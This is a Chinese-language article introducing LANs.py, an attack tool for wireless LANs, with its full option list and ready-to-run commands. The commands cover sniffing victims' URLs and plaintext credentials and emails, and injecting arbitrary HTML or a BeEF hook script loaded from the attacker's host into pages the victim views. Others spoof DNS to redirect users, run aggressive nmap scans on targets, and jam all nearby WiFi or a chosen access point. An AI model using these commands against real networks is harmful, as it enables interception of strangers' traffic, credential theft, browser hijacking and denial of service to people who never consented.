1. 程式人生 > >LANs.py:一款可以實現程式碼注入,無線滲透和WiFi使用者監控的強大工具

LANs.py:一款可以實現程式碼注入,無線滲透和WiFi使用者監控的強大工具

LANs.py

LANs.py功能簡介

1.      自動尋找當前網路中最為活躍的WLAN使用者,並對其中的一名使用者實施監控,然後向該使用者所訪問的Web頁面注入任意HTML或JavaScript程式碼;

2.      干擾附近的WiFi網路,干擾範圍取決於無線網絡卡的效能。我們可以通過修改配置來實現干擾所有人的WiFi訊號或僅干擾某一特定使用者的WiFi訊號。但是LANs.py不支援對使用者同時進行WiFi干擾和監聽。

依賴元件

Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目標使用者的IP地址,那麼你還需要一塊支援混雜模式的無線網絡卡)

測試環境為Kali Linux,發動攻擊的裝置地址為192.168.0.5,目標裝置的IP地址為192.168.0.10。

所有的可選操作項:

Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]
                [-rmac ROUTERMAC
] [-pcap PCAP][-s SKIP] [-ch CHANNEL]                 [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]                 [--directedonly] [--accesspointACCESSPOINT]

工具使用

目前該工具支援從以下協議收集資料:HTTP、FTP、IMAP、POP3和IRC。LANs.py將會打印出URL地址所返回的資源中前135個字元,並自動忽略結尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它還能夠輸出任意協議下傳輸的使用者名稱/密碼、以及接收或傳送的電子郵件和IRC訊息。

LANs.py 工具

常用命令:

python LANs.py -u -p

其他常用命令:

python LANs.py -u -p -d -ip 192.168.0.10

-d:檢視所有的圖片

-ip:設定目標IP地址

HTML注入:

python LANs.py -bhttp://192.168.0.5:3000/hook.js

向目標使用者所訪問的頁面中注入一個BeEF鉤子(http://beefproject.com/,【參考教程】),注入的引數會包裹在<script>標籤中,所以你可以在一個JavaScript檔案中的任意位置輸入內容。

python LANs.py -c'<title>Owned.</title>'

向目標使用者所訪問的頁面中注入任意HTML程式碼。工具首先會嘗試在第一個<head>標籤之後注入內容,如果失敗則嘗試在第一個</head>標籤之前注入內容。上面給出的示例程式碼會將頁面標題(title)修改為’Owned.’。

讀取pcap檔案:

python LANs.py -pcap libpcapfilename -ip192.168.0.10

為了成功讀取pcap檔案中的內容,你需要使用-ip引數指定目標IP。該功能的一個優點就是使用者無需使用root許可權便可執行該指令碼。

DNS欺騙:

python LANs.py -a -r 80.87.128.67

-a選項將會對目標發出的每一次DNS請求進行欺騙攻擊,並將使用者請求重定向至-r引數所制定的地址。無論使用者在位址列中輸入的是什麼地址,他們都將會被重定向到stallman.org(80.87.128.67)。

python LANs.py -dns eff.org

該命令將會對域名eff.org及其子域名進行DNS欺騙。

其他使用:

python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10

干擾所有的WiFi網路:

python LANs.py --jam

僅干擾指定接入點:

python Lans.py --jam --accesspoint01:MA:C0:AD:DY

所有的可用選項

常規使用:

-b BEEF_HOOK_URL:將BeEF hookURL注入到目標使用者所訪問的每一個頁面中,例如-bhttp://192.168.1.10:3000/hook.js

-c ‘HTML CODE’:向目標使用者訪問的頁面中注入任意HTML程式碼。

-d:檢視目標使用者訪問的圖片。

-dns DOMAIN:對指定DNS域名進行DNS欺騙攻擊,例如-dnsfacebook.com。

-a:對使用者的所有DNS請求進行DNS欺騙攻擊。

-r IPADDRESS: 僅用於-dnsDOMAIN選項。

-u:打印出目標使用者所使用的URL地址。

-i INTERFACE: 指定介面,例如-i wlan0。

-ip:指定目標IP地址。

-n: 對目標執行nmap掃描。

-na:在後臺對目標執行更具攻擊性的nmap掃描,並將掃描結果輸出到[victim IP address].nmap.txt。

-p:打印出FTP/IMAP/POP/IRC/HTTP協議下傳輸的使用者名稱/密碼、以及接收或傳送的電子郵件和IRC訊息。

-pcap PCAP_FILE: 解析pcap檔案中所有的資料包; 需要輸入-ip[target's IP address]引數。

-rmac ROUTER_MAC:指定路由器的MAC地址。

-rip ROUTER_IP:指定路由器的IP地址。

–jam:對2.4GHz無線接入點以及客戶端進行干擾攻擊。

WiFi干擾:

-sMAC_Address_to_skip:指定需跳過的MAC地址。

-m MAXIMUM: 指定攻擊客戶端的最大數量。

-t TIME_INTERVAL: 設定攻擊間隔。

–packets NUMBER:指定每一次攻擊中傳送的資料包數量。

–accesspoint ROUTER_MAC:輸入目標AP的MAC地址。